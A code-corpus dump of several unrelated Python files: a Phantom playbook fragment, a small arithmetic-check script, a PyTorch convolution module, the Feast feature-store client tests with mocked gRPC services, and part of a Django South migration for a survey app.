phantom.act("run job", parameters=parameters, assets=['ansible_tower'], name="run_job_1")
return
def on_finish(container, summary):
# This function is called after all actions are completed.
# Summary and/or action results can be collected here.
# summary_json = phantom.get_summary()
# summary_results = summary_json['result']
# for result in summary_results:
# action_run_id = result['id']
# action_results = phantom.get_action_results(action_run_id=action_run_id)
return |
py | b414fef2d580d163ff6d2380c90f94eb9e2bf948 | import typing
def main() -> typing.NoReturn:
a, b, c = map(int, input().split())
ans = 'YES' if 2 * b - a - c == 0 else 'NO'
print(ans)
main() |
py | b414ffd876c76775586825c03f2220000e46f0a5 | from functools import partial
from typing import Callable, Sequence
import numpy as np
import torch
from torch import Tensor
from torch import nn
import toys
from toys.parsers import parse_activation, parse_initializer
class Conv2d(nn.Module):
def __init__(self, in_channels, *channels, **kwargs):
'''Construct a 2D convolution layer.
Arguments:
in_channels (int):
The shape of feature channels in each inputs.
channels (int):
The number of activation maps in each layer.
Keyword Arguments:
kernel_size (int or Sequence[int]):
Size of the convolving kernel. Default: 3.
stride (float or int or Sequence[int]):
Stride of the convolution. Default: 1.
padding (int or Sequence[int]):
Zero-padding added to both sides of the input. Default: 0.
output_padding (int or Sequence[int]):
Additional size added to one side of each dimension in the
output shape, when using fractional stride. Default: 0.
dilation (int or Sequence[int]):
Spacing between kernel elements. Default: 1.
groups (int):
Number of blocked connections from input channels to output
channels. Default: 1.
bias (bool):
If set to False, the layer will not learn an additive bias.
Default: ``True``.
pooling (Callable or None):
A constructor for a pooling layer to apply after all
convolutions. Default: None.
**TODO**: Accept string values; requires extending `toys.parsers`.
activation ([Tensor] -> Tensor or str or None):
An activation function to apply after the convolution.
Default: :obj:`None`.
initializer ([Tensor] -> Tensor or str):
An initializer function for the weights.
Default: ``'kaiming_uniform'``.
bias_initializer ([Tensor] -> Tensor or str):
An initializer function for the bias.
Default: ``'constant:val=0'``.
'''
super().__init__()
kernel_size = kwargs.setdefault('kernel_size', 3)
stride = kwargs.setdefault('stride', 1)
padding = kwargs.setdefault('padding', 0)
output_padding = kwargs.setdefault('output_padding', 0)
dilation = kwargs.setdefault('dilation', 1)
groups = kwargs.setdefault('groups', 1)
bias = kwargs.setdefault('bias', True)
pooling = kwargs.setdefault('pooling', None)
actv = kwargs.setdefault('activation', None)
init = kwargs.setdefault('initializer', 'kaiming_uniform')
bias_init = kwargs.setdefault('bias_initializer', 'constant:val=0')
actv = parse_activation(actv)
init = parse_initializer(init)
bias_init = parse_initializer(bias_init)
assert 0 < len(channels)
assert 0 < stride
if 0 < stride < 1:
stride = int(1/stride)
Conv2d = partial(nn.ConvTranspose2d, output_padding=output_padding)
else:
assert output_padding == 0
Conv2d = nn.Conv2d
# TODO: create a parser for pooling arguments
if pooling is None:
pooling_layer = lambda x: x
else:
pooling_layer = pooling()
layers = []
prev = in_channels
for c in channels:
conv = Conv2d(prev, c,
kernel_size=kernel_size, stride=stride, padding=padding,
dilation=dilation, groups=groups, bias=bias)
conv.weight = init(conv.weight)
conv.bias = bias_init(conv.bias)
layers.append(conv)
prev = c
self.layers = nn.ModuleList(layers)
self.actv = actv
self.pooling = pooling_layer
def forward(self, x):
(*batch, height, width, channels) = x.shape
x = x.view(-1, height, width, channels)
x = torch.einsum('nhwc->nchw', [x])
for layer in self.layers:
x = layer(x)
x = self.actv(x)
x = torch.einsum('nchw->nhwc', [x])
x = x.view(*batch, height, width, -1)
x = self.pooling(x)
return x
|
py | b41500125cd0c162215b2cf015bae12b543daf7d | # Copyright 2019 The Feast Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pkgutil
import tempfile
from concurrent import futures
from datetime import datetime
from unittest import mock
import grpc
import pandas as pd
import pytest
from google.protobuf.duration_pb2 import Duration
from mock import MagicMock, patch
from pandavro import to_avro
from pytz import timezone
import dataframes
import feast.core.CoreService_pb2_grpc as Core
import feast.serving.ServingService_pb2_grpc as Serving
from feast.client import Client
from feast.core.CoreService_pb2 import (
GetFeastCoreVersionResponse,
GetFeatureSetResponse,
)
from feast.core.FeatureSet_pb2 import EntitySpec as EntitySpecProto
from feast.core.FeatureSet_pb2 import FeatureSet as FeatureSetProto
from feast.core.FeatureSet_pb2 import FeatureSetMeta as FeatureSetMetaProto
from feast.core.FeatureSet_pb2 import FeatureSetSpec as FeatureSetSpecProto
from feast.core.FeatureSet_pb2 import FeatureSetStatus as FeatureSetStatusProto
from feast.core.FeatureSet_pb2 import FeatureSpec as FeatureSpecProto
from feast.core.Source_pb2 import KafkaSourceConfig, Source, SourceType
from feast.entity import Entity
from feast.feature_set import Feature, FeatureSet
from feast.job import Job
from feast.serving.ServingService_pb2 import (
DataFormat,
FeastServingType,
GetBatchFeaturesResponse,
GetFeastServingInfoResponse,
GetJobResponse,
GetOnlineFeaturesRequest,
GetOnlineFeaturesResponse,
)
from feast.serving.ServingService_pb2 import Job as BatchFeaturesJob
from feast.serving.ServingService_pb2 import JobStatus, JobType
from feast.source import KafkaSource
from feast.types import Value_pb2 as ValueProto
from feast.value_type import ValueType
from feast_core_server import CoreServicer
from feast_serving_server import ServingServicer
CORE_URL = "core.feast.example.com"
SERVING_URL = "serving.example.com"
_PRIVATE_KEY_RESOURCE_PATH = "data/localhost.key"
_CERTIFICATE_CHAIN_RESOURCE_PATH = "data/localhost.pem"
_ROOT_CERTIFICATE_RESOURCE_PATH = "data/localhost.crt"
class TestClient:
@pytest.fixture
def secure_mock_client(self, mocker):
client = Client(
core_url=CORE_URL,
serving_url=SERVING_URL,
core_secure=True,
serving_secure=True,
)
mocker.patch.object(client, "_connect_core")
mocker.patch.object(client, "_connect_serving")
client._core_url = CORE_URL
client._serving_url = SERVING_URL
return client
@pytest.fixture
def mock_client(self, mocker):
client = Client(core_url=CORE_URL, serving_url=SERVING_URL)
mocker.patch.object(client, "_connect_core")
mocker.patch.object(client, "_connect_serving")
client._core_url = CORE_URL
client._serving_url = SERVING_URL
return client
@pytest.fixture
def server_credentials(self):
private_key = pkgutil.get_data(__name__, _PRIVATE_KEY_RESOURCE_PATH)
certificate_chain = pkgutil.get_data(__name__, _CERTIFICATE_CHAIN_RESOURCE_PATH)
return grpc.ssl_server_credentials(((private_key, certificate_chain),))
@pytest.fixture
def core_server(self):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Core.add_CoreServiceServicer_to_server(CoreServicer(), server)
server.add_insecure_port("[::]:50051")
server.start()
yield server
server.stop(0)
@pytest.fixture
def serving_server(self):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Serving.add_ServingServiceServicer_to_server(ServingServicer(), server)
server.add_insecure_port("[::]:50052")
server.start()
yield server
server.stop(0)
@pytest.fixture
def secure_core_server(self, server_credentials):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Core.add_CoreServiceServicer_to_server(CoreServicer(), server)
server.add_secure_port("[::]:50053", server_credentials)
server.start()
yield server
server.stop(0)
@pytest.fixture
def secure_serving_server(self, server_credentials):
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
Serving.add_ServingServiceServicer_to_server(ServingServicer(), server)
server.add_secure_port("[::]:50054", server_credentials)
server.start()
yield server
server.stop(0)
@pytest.fixture
def secure_client(self, secure_core_server, secure_serving_server):
root_certificate_credentials = pkgutil.get_data(
__name__, _ROOT_CERTIFICATE_RESOURCE_PATH
)
# this is needed to establish a secure connection using self-signed certificates, for the purpose of the test
ssl_channel_credentials = grpc.ssl_channel_credentials(
root_certificates=root_certificate_credentials
)
with mock.patch(
"grpc.ssl_channel_credentials",
MagicMock(return_value=ssl_channel_credentials),
):
yield Client(
core_url="localhost:50053",
serving_url="localhost:50054",
core_secure=True,
serving_secure=True,
)
@pytest.fixture
def client(self, core_server, serving_server):
return Client(core_url="localhost:50051", serving_url="localhost:50052")
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_version(self, mocked_client, mocker):
mocked_client._core_service_stub = Core.CoreServiceStub(
grpc.insecure_channel("")
)
mocked_client._serving_service_stub = Serving.ServingServiceStub(
grpc.insecure_channel("")
)
mocker.patch.object(
mocked_client._core_service_stub,
"GetFeastCoreVersion",
return_value=GetFeastCoreVersionResponse(version="0.3.2"),
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetFeastServingInfo",
return_value=GetFeastServingInfoResponse(version="0.3.2"),
)
status = mocked_client.version()
assert (
status["core"]["url"] == CORE_URL
and status["core"]["version"] == "0.3.2"
and status["serving"]["url"] == SERVING_URL
and status["serving"]["version"] == "0.3.2"
)
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_get_online_features(self, mocked_client, mocker):
ROW_COUNT = 300
mocked_client._serving_service_stub = Serving.ServingServiceStub(
grpc.insecure_channel("")
)
fields = dict()
for feature_num in range(1, 10):
fields[f"my_project/feature_{str(feature_num)}:1"] = ValueProto.Value(
int64_val=feature_num
)
field_values = GetOnlineFeaturesResponse.FieldValues(fields=fields)
response = GetOnlineFeaturesResponse()
entity_rows = []
for row_number in range(1, ROW_COUNT + 1):
response.field_values.append(field_values)
entity_rows.append(
GetOnlineFeaturesRequest.EntityRow(
fields={"customer_id": ValueProto.Value(int64_val=row_number)}
)
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetOnlineFeatures",
return_value=response,
)
response = mocked_client.get_online_features(
entity_rows=entity_rows,
feature_refs=[
"my_project/feature_1:1",
"my_project/feature_2:1",
"my_project/feature_3:1",
"my_project/feature_4:1",
"my_project/feature_5:1",
"my_project/feature_6:1",
"my_project/feature_7:1",
"my_project/feature_8:1",
"my_project/feature_9:1",
],
) # type: GetOnlineFeaturesResponse
assert (
response.field_values[0].fields["my_project/feature_1:1"].int64_val == 1
and response.field_values[0].fields["my_project/feature_9:1"].int64_val == 9
)
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_get_feature_set(self, mocked_client, mocker):
mocked_client._core_service_stub = Core.CoreServiceStub(
grpc.insecure_channel("")
)
from google.protobuf.duration_pb2 import Duration
mocker.patch.object(
mocked_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(
feature_set=FeatureSetProto(
spec=FeatureSetSpecProto(
name="my_feature_set",
version=2,
max_age=Duration(seconds=3600),
features=[
FeatureSpecProto(
name="my_feature_1",
value_type=ValueProto.ValueType.FLOAT,
),
FeatureSpecProto(
name="my_feature_2",
value_type=ValueProto.ValueType.FLOAT,
),
],
entities=[
EntitySpecProto(
name="my_entity_1",
value_type=ValueProto.ValueType.INT64,
)
],
source=Source(
type=SourceType.KAFKA,
kafka_source_config=KafkaSourceConfig(
bootstrap_servers="localhost:9092", topic="topic"
),
),
),
meta=FeatureSetMetaProto(),
)
),
)
mocked_client.set_project("my_project")
feature_set = mocked_client.get_feature_set("my_feature_set", version=2)
assert (
feature_set.name == "my_feature_set"
and feature_set.version == 2
and feature_set.fields["my_feature_1"].name == "my_feature_1"
and feature_set.fields["my_feature_1"].dtype == ValueType.FLOAT
and feature_set.fields["my_entity_1"].name == "my_entity_1"
and feature_set.fields["my_entity_1"].dtype == ValueType.INT64
and len(feature_set.features) == 2
and len(feature_set.entities) == 1
)
@pytest.mark.parametrize(
"mocked_client",
[pytest.lazy_fixture("mock_client"), pytest.lazy_fixture("secure_mock_client")],
)
def test_get_batch_features(self, mocked_client, mocker):
mocked_client._serving_service_stub = Serving.ServingServiceStub(
grpc.insecure_channel("")
)
mocked_client._core_service_stub = Core.CoreServiceStub(
grpc.insecure_channel("")
)
mocker.patch.object(
mocked_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(
feature_set=FeatureSetProto(
spec=FeatureSetSpecProto(
name="customer_fs",
version=1,
project="my_project",
entities=[
EntitySpecProto(
name="customer", value_type=ValueProto.ValueType.INT64
),
EntitySpecProto(
name="transaction",
value_type=ValueProto.ValueType.INT64,
),
],
features=[
FeatureSpecProto(
name="customer_feature_1",
value_type=ValueProto.ValueType.FLOAT,
),
FeatureSpecProto(
name="customer_feature_2",
value_type=ValueProto.ValueType.STRING,
),
],
),
meta=FeatureSetMetaProto(status=FeatureSetStatusProto.STATUS_READY),
)
),
)
expected_dataframe = pd.DataFrame(
{
"datetime": [datetime.utcnow() for _ in range(3)],
"customer": [1001, 1002, 1003],
"transaction": [1001, 1002, 1003],
"my_project/customer_feature_1:1": [1001, 1002, 1003],
"my_project/customer_feature_2:1": [1001, 1002, 1003],
}
)
final_results = tempfile.mktemp()
to_avro(file_path_or_buffer=final_results, df=expected_dataframe)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetBatchFeatures",
return_value=GetBatchFeaturesResponse(
job=BatchFeaturesJob(
id="123",
type=JobType.JOB_TYPE_DOWNLOAD,
status=JobStatus.JOB_STATUS_DONE,
file_uris=[f"file://{final_results}"],
data_format=DataFormat.DATA_FORMAT_AVRO,
)
),
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetJob",
return_value=GetJobResponse(
job=BatchFeaturesJob(
id="123",
type=JobType.JOB_TYPE_DOWNLOAD,
status=JobStatus.JOB_STATUS_DONE,
file_uris=[f"file://{final_results}"],
data_format=DataFormat.DATA_FORMAT_AVRO,
)
),
)
mocker.patch.object(
mocked_client._serving_service_stub,
"GetFeastServingInfo",
return_value=GetFeastServingInfoResponse(
job_staging_location=f"file://{tempfile.mkdtemp()}/",
type=FeastServingType.FEAST_SERVING_TYPE_BATCH,
),
)
mocked_client.set_project("project1")
response = mocked_client.get_batch_features(
entity_rows=pd.DataFrame(
{
"datetime": [
pd.datetime.now(tz=timezone("Asia/Singapore")) for _ in range(3)
],
"customer": [1001, 1002, 1003],
"transaction": [1001, 1002, 1003],
}
),
feature_refs=[
"my_project/customer_feature_1:1",
"my_project/customer_feature_2:1",
],
) # type: Job
assert response.id == "123" and response.status == JobStatus.JOB_STATUS_DONE
actual_dataframe = response.to_dataframe()
assert actual_dataframe[
["my_project/customer_feature_1:1", "my_project/customer_feature_2:1"]
].equals(
expected_dataframe[
["my_project/customer_feature_1:1", "my_project/customer_feature_2:1"]
]
)
@pytest.mark.parametrize(
"test_client",
[pytest.lazy_fixture("client"), pytest.lazy_fixture("secure_client")],
)
def test_apply_feature_set_success(self, test_client):
test_client.set_project("project1")
# Create Feature Sets
fs1 = FeatureSet("my-feature-set-1")
fs1.add(Feature(name="fs1-my-feature-1", dtype=ValueType.INT64))
fs1.add(Feature(name="fs1-my-feature-2", dtype=ValueType.STRING))
fs1.add(Entity(name="fs1-my-entity-1", dtype=ValueType.INT64))
fs2 = FeatureSet("my-feature-set-2")
fs2.add(Feature(name="fs2-my-feature-1", dtype=ValueType.STRING_LIST))
fs2.add(Feature(name="fs2-my-feature-2", dtype=ValueType.BYTES_LIST))
fs2.add(Entity(name="fs2-my-entity-1", dtype=ValueType.INT64))
# Register Feature Set with Core
test_client.apply(fs1)
test_client.apply(fs2)
feature_sets = test_client.list_feature_sets()
# List Feature Sets
assert (
len(feature_sets) == 2
and feature_sets[0].name == "my-feature-set-1"
and feature_sets[0].features[0].name == "fs1-my-feature-1"
and feature_sets[0].features[0].dtype == ValueType.INT64
and feature_sets[1].features[1].dtype == ValueType.BYTES_LIST
)
@pytest.mark.parametrize(
"dataframe,test_client",
[
(dataframes.GOOD, pytest.lazy_fixture("client")),
(dataframes.GOOD, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_ingest_success(self, dataframe, test_client, mocker):
test_client.set_project("project1")
driver_fs = FeatureSet(
"driver-feature-set", source=KafkaSource(brokers="kafka:9092", topic="test")
)
driver_fs.add(Feature(name="feature_1", dtype=ValueType.FLOAT))
driver_fs.add(Feature(name="feature_2", dtype=ValueType.STRING))
driver_fs.add(Feature(name="feature_3", dtype=ValueType.INT64))
driver_fs.add(Entity(name="entity_id", dtype=ValueType.INT64))
# Register with Feast core
test_client.apply(driver_fs)
driver_fs = driver_fs.to_proto()
driver_fs.meta.status = FeatureSetStatusProto.STATUS_READY
mocker.patch.object(
test_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(feature_set=driver_fs),
)
# Need to create a mock producer
with patch("feast.client.get_producer"):
# Ingest data into Feast
test_client.ingest("driver-feature-set", dataframe)
@pytest.mark.parametrize(
"dataframe,exception,test_client",
[
(dataframes.GOOD, TimeoutError, pytest.lazy_fixture("client")),
(dataframes.GOOD, TimeoutError, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_ingest_fail_if_pending(
self, dataframe, exception, test_client, mocker
):
with pytest.raises(exception):
test_client.set_project("project1")
driver_fs = FeatureSet(
"driver-feature-set",
source=KafkaSource(brokers="kafka:9092", topic="test"),
)
driver_fs.add(Feature(name="feature_1", dtype=ValueType.FLOAT))
driver_fs.add(Feature(name="feature_2", dtype=ValueType.STRING))
driver_fs.add(Feature(name="feature_3", dtype=ValueType.INT64))
driver_fs.add(Entity(name="entity_id", dtype=ValueType.INT64))
# Register with Feast core
test_client.apply(driver_fs)
driver_fs = driver_fs.to_proto()
driver_fs.meta.status = FeatureSetStatusProto.STATUS_PENDING
mocker.patch.object(
test_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(feature_set=driver_fs),
)
# Need to create a mock producer
with patch("feast.client.get_producer"):
# Ingest data into Feast
test_client.ingest("driver-feature-set", dataframe, timeout=1)
@pytest.mark.parametrize(
"dataframe,exception,test_client",
[
(dataframes.BAD_NO_DATETIME, Exception, pytest.lazy_fixture("client")),
(
dataframes.BAD_INCORRECT_DATETIME_TYPE,
Exception,
pytest.lazy_fixture("client"),
),
(dataframes.BAD_NO_ENTITY, Exception, pytest.lazy_fixture("client")),
(dataframes.NO_FEATURES, Exception, pytest.lazy_fixture("client")),
(
dataframes.BAD_NO_DATETIME,
Exception,
pytest.lazy_fixture("secure_client"),
),
(
dataframes.BAD_INCORRECT_DATETIME_TYPE,
Exception,
pytest.lazy_fixture("secure_client"),
),
(dataframes.BAD_NO_ENTITY, Exception, pytest.lazy_fixture("secure_client")),
(dataframes.NO_FEATURES, Exception, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_ingest_failure(self, test_client, dataframe, exception):
with pytest.raises(exception):
# Create feature set
driver_fs = FeatureSet("driver-feature-set")
# Update based on dataset
driver_fs.infer_fields_from_df(dataframe)
# Register with Feast core
test_client.apply(driver_fs)
# Ingest data into Feast
test_client.ingest(driver_fs, dataframe=dataframe)
@pytest.mark.parametrize(
"dataframe,test_client",
[
(dataframes.ALL_TYPES, pytest.lazy_fixture("client")),
(dataframes.ALL_TYPES, pytest.lazy_fixture("secure_client")),
],
)
def test_feature_set_types_success(self, test_client, dataframe, mocker):
test_client.set_project("project1")
all_types_fs = FeatureSet(
name="all_types",
entities=[Entity(name="user_id", dtype=ValueType.INT64)],
features=[
Feature(name="float_feature", dtype=ValueType.FLOAT),
Feature(name="int64_feature", dtype=ValueType.INT64),
Feature(name="int32_feature", dtype=ValueType.INT32),
Feature(name="string_feature", dtype=ValueType.STRING),
Feature(name="bytes_feature", dtype=ValueType.BYTES),
Feature(name="bool_feature", dtype=ValueType.BOOL),
Feature(name="double_feature", dtype=ValueType.DOUBLE),
Feature(name="float_list_feature", dtype=ValueType.FLOAT_LIST),
Feature(name="int64_list_feature", dtype=ValueType.INT64_LIST),
Feature(name="int32_list_feature", dtype=ValueType.INT32_LIST),
Feature(name="string_list_feature", dtype=ValueType.STRING_LIST),
Feature(name="bytes_list_feature", dtype=ValueType.BYTES_LIST),
# Feature(name="bool_list_feature",
# dtype=ValueType.BOOL_LIST), # TODO: Add support for this
# type again https://github.com/gojek/feast/issues/341
Feature(name="double_list_feature", dtype=ValueType.DOUBLE_LIST),
],
max_age=Duration(seconds=3600),
)
# Register with Feast core
test_client.apply(all_types_fs)
mocker.patch.object(
test_client._core_service_stub,
"GetFeatureSet",
return_value=GetFeatureSetResponse(feature_set=all_types_fs.to_proto()),
)
# Need to create a mock producer
with patch("feast.client.get_producer"):
# Ingest data into Feast
test_client.ingest(all_types_fs, dataframe)
@patch("grpc.channel_ready_future")
def test_secure_channel_creation_with_secure_client(self, _mocked_obj):
client = Client(
core_url="localhost:50051",
serving_url="localhost:50052",
serving_secure=True,
core_secure=True,
)
with mock.patch("grpc.secure_channel") as _grpc_mock, mock.patch(
"grpc.ssl_channel_credentials", MagicMock(return_value="test")
) as _mocked_credentials:
client._connect_serving()
_grpc_mock.assert_called_with(
client.serving_url, _mocked_credentials.return_value
)
@mock.patch("grpc.channel_ready_future")
def test_secure_channel_creation_with_secure_serving_url(
self, _mocked_obj,
):
client = Client(core_url="localhost:50051", serving_url="localhost:443")
with mock.patch("grpc.secure_channel") as _grpc_mock, mock.patch(
"grpc.ssl_channel_credentials", MagicMock(return_value="test")
) as _mocked_credentials:
client._connect_serving()
_grpc_mock.assert_called_with(
client.serving_url, _mocked_credentials.return_value
)
@patch("grpc.channel_ready_future")
def test_secure_channel_creation_with_secure_core_url(self, _mocked_obj):
client = Client(core_url="localhost:443", serving_url="localhost:50054")
with mock.patch("grpc.secure_channel") as _grpc_mock, mock.patch(
"grpc.ssl_channel_credentials", MagicMock(return_value="test")
) as _mocked_credentials:
client._connect_core()
_grpc_mock.assert_called_with(
client.core_url, _mocked_credentials.return_value
)
|
py | b415011c308bfbe645607a59b024e080d17fed36 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Pages'
db.create_table(u'survey_pages', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('pageNum', self.gf('django.db.models.fields.CharField')(max_length=256, null=True, blank=True)),
('associatedS', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.Source'], null=True, blank=True)),
))
db.send_create_signal(u'survey', ['Pages'])
# Adding M2M table for field new on 'Response'
m2m_table_name = db.shorten_name('responses_new')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('response', models.ForeignKey(orm[u'survey.response'], null=False)),
('pages', models.ForeignKey(orm[u'survey.pages'], null=False))
))
db.create_unique(m2m_table_name, ['response_id', 'pages_id'])
def backwards(self, orm):
# Deleting model 'Pages'
db.delete_table(u'survey_pages')
# Removing M2M table for field new on 'Response'
db.delete_table(db.shorten_name('responses_new'))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.culture': {
'Meta': {'ordering': "['culture']", 'object_name': 'Culture', 'db_table': "'cultures'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'coder': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'culture': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'fact': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'languages': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Language']", 'symmetrical': 'False', 'blank': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'})
},
u'core.language': {
'Meta': {'ordering': "['language']", 'unique_together': "(('isocode', 'language'),)", 'object_name': 'Language', 'db_table': "'languages'"},
'abvdcode': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'classification': ('django.db.models.fields.TextField', [], {}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isocode': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '3', 'db_index': 'True'}),
'language': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
u'core.section': {
'Meta': {'ordering': "['id']", 'object_name': 'Section', 'db_table': "'sections'"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'notes': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'section': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '128'})
},
u'core.source': {
'Meta': {'ordering': "['author', 'year']", 'unique_together': "(['author', 'year'],)", 'object_name': 'Source', 'db_table': "'sources'", 'index_together': "[['author', 'year']]"},
'added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'bibtex': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reference': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '1000'}),
'year': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'})
},
u'survey.floatresponse': {
'Meta': {'object_name': 'FloatResponse', 'db_table': "'responses_floats'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'})
},
u'survey.integerresponse': {
'Meta': {'object_name': 'IntegerResponse', 'db_table': "'responses_integers'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'response_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Response']", 'unique': 'True', 'primary_key': 'True'})
},
u'survey.optionquestion': {
'Meta': {'object_name': 'OptionQuestion', 'db_table': "'questions_option'", '_ormbases': [u'survey.Question']},
'options': ('django.db.models.fields.TextField', [], {}),
u'question_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['survey.Question']", 'unique': 'True', 'primary_key': 'True'})
},
u'survey.optionresponse': {
'Meta': {'object_name': 'OptionResponse', 'db_table': "'responses_options'", '_ormbases': [u'survey.Response']},
'response': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
